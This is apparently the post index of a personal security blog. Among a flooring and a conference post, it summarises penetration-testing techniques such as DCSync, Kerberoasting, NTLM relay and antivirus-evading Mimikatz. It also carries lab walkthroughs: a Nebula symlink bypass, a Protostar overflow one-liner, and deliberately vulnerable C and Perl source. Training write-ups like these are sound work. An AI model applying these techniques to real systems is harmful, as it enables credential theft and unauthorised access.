Friday, January 11, 2019

DIY - Laying Hardwood Flooring

During the summer, I tasked myself with laying hardwood floors in our upstairs hallway and master bedroom. I've installed hardwood floors in the past, but I usually had help from my father-in-law. This time, I borrowed his tools and tackled the project myself. I did however have some help from my pregnant wife and mother-in-law (organized hardwood, vacuum, etc.) but all in all, I'd like to think that I successfully installed the flooring myself!

Master Bedroom complete

Thursday, January 10, 2019

SecKC Speaker Badge - Name Badge Hack

Over the past year, I have gained a fascination towards hardware hacking, soldering and building. For anyone that doesn't know, I am an active member of SecKC, the world's largest monthly information security meetup in Kansas City. Every month attendees get together in a relaxed environment and learn about security via networking and presentations. Recently, a SecKC participant started making Speaker badges. I was lucky enough to receive one during a Red vs Blue panel discussion back in 2018. With this speaker badge in hand and my eagerness to learn more about hardware hacking, I decided to put the pedal to the metal and make myself a custom name badge! Below are things I learned along the journey of creating this badge.




Thursday, November 29, 2018

Post Exploitation - Pulling NTDS and extracting with SecretsDump

To continue our example of targeting Active Directory, below is an example of how an attacker can pillage the NTDS file after obtaining a Domain Admin account that has access to a Domain Controller.

Tuesday, November 20, 2018

Gaining a foodhold: The Rubber Ducky and Powershell Empire

So, I recently acquired my first rubber ducky and I've been messing around with it quite a bit. I wanted to document the basic setup and provide some links for further reading.

All of my write-ups are conducted in a lab, but I try to emulate what can happen in real life. In our example below, I want to emulate a rubber ducky being plugged into a corporate managed windows device. This could have been done by either an attacker gaining physical access and plugging the rubber ducky in directly, or as done in past years, dropping them in parking lots and having employees pick them up and plugging them into their workstation. Either way, let's demonstrate what can happen.

We will be utilizing Kali as our payload generating machine and PowerShell Empire Server; and we will be attacking a Windows 7 host.

To start, we need to make sure we know which pieces of the rubber ducky do what. In it's simplest form, we will be utilizing 3 pieces. The micro SD card that carry our payload, the USB that allows us to write to it, the USB that will be delivering our payload.

USB used to write payload


Friday, November 2, 2018

Post Exploitation - DCSync


Now that we have a Domain Admin account, another step that can be taken is to run "DCSync". DCSync effectively impersonates a Domain Controller and requests account password data from the targeted Domain Controller. This will allow an attacker to potentially maintain persistence by acquiring more credentials across the domain.

As always, this is more of a step-by-step walkthrough on how the actions are performed. There are many other blogs that go into further detail on the attack and how to mitigate. I will not be doing that here.



To continue about our example, we will assume the following:

Gaining a foothold: Using Responder and NTLM Relay attack

A previous post showed how to capture hashes and cracking them. But what if you can't crack the passwords? Is there anyway to pass this captured hash instead? Lucky for us, there is! A great post written by byt3bl33d3r back in 2017 that covers exactly what I'm about to briefly show, I suggest you check out his post for more information.

Like most my posts, I only scratch the surface and emulate a real attack. I don't go in depth since there are tons of other write-ups out there that do. Instead, I make more of a step-by-step illustration of how the attack was conducted.



To get started, it is important to know the difference between some of the technology:

Friday, October 26, 2018

Post Exploitation - Kerberoasting

Below is a real world use case of kerberoasting. This is not intended to be a guide on kerberoasting, there are way better guides out there and explanations on how it all works. Rather, this is more of a step by step walk-through of using kerberoasting to escalate privileges from a regular domain user to a higher privileged user.


Thursday, May 17, 2018

Gaining a foothold: Using Responder to capture NTLMv2 Hashes and cracking with John the Ripper

Recently, I finally got my new home lab set up and I figured it was time to start documenting some tools that are used quite often within penetration testing.

Today I am going to demonstrate how to run Responder in its most basic form, capture an NTLMv2 Hash and cracking it with John the Ripper. While this will not be an exhaustive list and showing all the possible examples (there are many blog posts out there that do), I will just be demonstrating how this can be done at its simplest form. It is up to you to decide how far you want to go with this information.


Wednesday, May 2, 2018

Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

About

The other day I was part of an engagement that required a post exploitation (already obtained administrative access to the system) of the target system and steal credentials. There are many posts online that have done this and I will be referencing them as we go. This is just a supplement to everything else out there.

Mimikatz is a tool that collects credentials, including cleartext passwords, Lan manager hashes, Kerberos tickets and a number of other items. This post is to leverage Mimikatz, but instead of downloading the binary to the targets disk and jeopardizing AntiVirus to trip, or other host based controls stopping us, we will download the script directly in memory and run it without ever touching disk.

Additionally, there are a few obfuscation techniques that can be used with simple Linux fu to help generate this "custom" version of Mimikatz to help bypass AV. Lastly, there is another technique to help obfuscate the actual powershell command that calls the download to run the exploit.


Tuesday, April 24, 2018

Privilege Escalation thru CyberArk Viewfinity

A while ago I encountered a bug within Viewfinity 5.5 (5.5.10.95). Viewfinity is a product owned by CyberArk that provides Endpoint Privilege Management. It bolsters administrator's ability to control user privileges on corporate desktops. Below is a use case in which I was able to elevate privileges from a normal user to Admin through this product.

Step 1: Verify you are a low privilege user by running the command "net session". Net session displays information about all sessions within the local computer. The user will get Access is denied if they do not have Administrator privileges.


Thursday, October 5, 2017

RickdiculouslyEasy: 1 - Walkthrough

It has been a long time since I've last posted anything off of Vulnhub. To be honest, I just haven't had too much time to dive into any of these VM's. However, g0tmi1k released a ton of new VM's so I wanted to check them out. One of which is was RickdiculouslyEasy: 1 made by Luke.

This VM is based off the tv show Rick and Morty. I, myself, am a fan of this show so I had to check it out. It turned out to be quite easy but I still had fun solving it. Below is my walkthrough on capturing all of the flags. 


Friday, June 30, 2017

Elevate from Admin to NT Authority\SYSTEM

Elevate from Admin to NT Authority\SYSTEM


The other day I gained Administrative access to a windows machine. While I was enumerating around, I had the urge to escalate to the most powerful account on a Windows local instance: NT Authority\SYSTEM.

I realized there weren't a lot of posts online about it. I figured I'd give the steps I did in order to accomplish this task.



Wednesday, May 3, 2017

64Base - Walkthrough




It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!



Monday, April 10, 2017

Protostar - stack4

This is my fifth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


About

Stack4 takes a look at overwriting saved EIP and standard buffer overflows.
This level is at /opt/protostar/bin/stack4
Hints
  • A variety of introductory papers into buffer overflows may help.
  • gdb lets you do “run < input”
  • EIP is not directly after the end of buffer, compiler padding can also increase the size.

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}


Nebula - level08

This is my ninth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Source code

There is no source code available for this level


Thursday, March 9, 2017

Protostar - stack3

This is my fourth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints
  • both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}


Tuesday, March 7, 2017

Nebula - level07

This is my eighth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

Source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Saturday, March 4, 2017

Nebula - level06

This is my seventh post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level


Nebula - level05

This is my sixth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level


Wednesday, March 1, 2017

Protostar - stack1

This is my second post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.


Source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

We read our code above. There are arguments that state if we give the appropriate argument, we will read the file. If it's token but we don't ave access, we fail. If it's a file we cannot read, we fail. If we break the buffer, we fail.

So, it looks like we need proper privileges to read the token file.

With our information in hand, we SSH into the host:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
level04@nebula:/home/flag04$ ls -lah
total 13K
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ 

Per usual, we see the flag04 file is has SUID and is owned by flag04 and allows level04 (us) to run it.

We run the file to get a feel with what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around and realizing that the code allows us to execute, we just need to create a symbolic link on a file that "we" own and have the program call that file.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We create a symbolic link to /tmp/level04 to /home/flag04/token. We verify with ls -lah.

We then test our theory and execute:


level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.

Thanks for reading!

-geoda





Monday, February 27, 2017

Protostar - stack0

This is my first post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


To begin, I run the program to see what's going on:

$ ./stack0

Try again?
$ ./stack0
HI
Try again?
$ 

Okay. Looks like that wasn't what we wanted.

Based off the code, we want to have the program print "you have changed the 'modified' variable". To do this, we need to crash the program.

We have 64 bytes of buffer allocated. If we can send more than 64 bytes, we will change the modified variable from 0 to not 0.

Let's give this a whirl:


$ python -c 'print "A" * 64' | ./stack0
Try again?
$ python -c 'print "A" * 65' | ./stack0
you have changed the 'modified' variable
$ 

Excellent!

Our next attempt will be on stack1.

Thanks for reading!

-geoda





Sunday, February 26, 2017

Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Saturday, February 25, 2017

Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level01

This is the second post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level00

This is my first post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Lord of the Root: Walkthrough

Below is my walkthrough for a VM posted on Vulnhub by KookSec called Lord Of The Root back in 2015.



Sunday, February 12, 2017

Pegasus: 1 - Walkthrough


This vulnhub image is called "Pegasus: 1" and it was created by Knapsy.



I found this VM had the perfect balance of remote and local exploitation. There were definitely times during this where I was slamming my head on the desk confused at what I was doing wrong. Other times, I knew exactly what I needed to do, I just didn't know how to actually accomplish the task. This really brought me back to my OSCP days and the infamous "Try Harder". Like anything, if you don't know how to achieve something, spend time researching and learning; it will eventually pay off!

Thursday, October 13, 2016

DerbyCon 6.0 - Recharge: My First Security Conference


It's been a while since I've posted anything. I'm actually getting married in a few short weeks and found that my life has been pretty hectic lately. But I knew before I went on my honeymoon, that I needed to find some time to briefly write about the BEST (and my first ;]) security conference: DerbyCon!

Tuesday, August 30, 2016

Breach: 2.1 Walkthrough


The past few weeks I've been working off and on with Breach 2.0/2.1 created by mrb3n.

This VM was a ton of fun. I've always enjoyed the movie Office Space and anytime there's a theme that interests me, it makes it even more fun to compromise!

Without further ado, here's my walkthrough of the latest VM on VulnHub... Breach 2.0:


Saturday, August 13, 2016

Tommy Boy: 1 Walkthrough

Today I finally completed the Tommy Boy: 1 VM created by Brian Johnson that was on VulnHub. 

This was one of my favorite VM's seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.

The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."

Sounds simple enough, let's see what it had to take to pwn this box!


Friday, August 12, 2016

TopHatSec: Freshly Walkthrough

Another VM that I found on VulnHub is TopHatSec: Freshly that is created by TopHatSec.

I had this VM in my KeepNote for a while now, but never thought to throw it up online until recently. Here's my reenactment for rooting this box several months ago:

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24:

Thursday, August 11, 2016

BNE0x03 - Simple Walkthrough

This is my first VulnHub write-up. I've accrued many folders in my KeepNote and decided it was time to post them in a centralized location to help myself become better at documenting my findings. More than likely the first few posts will be very simple and will not have much narrative. As I become more comfortable, I will start to add my own spin on things. Let's do this.

This VM is called SecTalks: BNE0x03 - Simple and it was created by Robert Winkel

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24: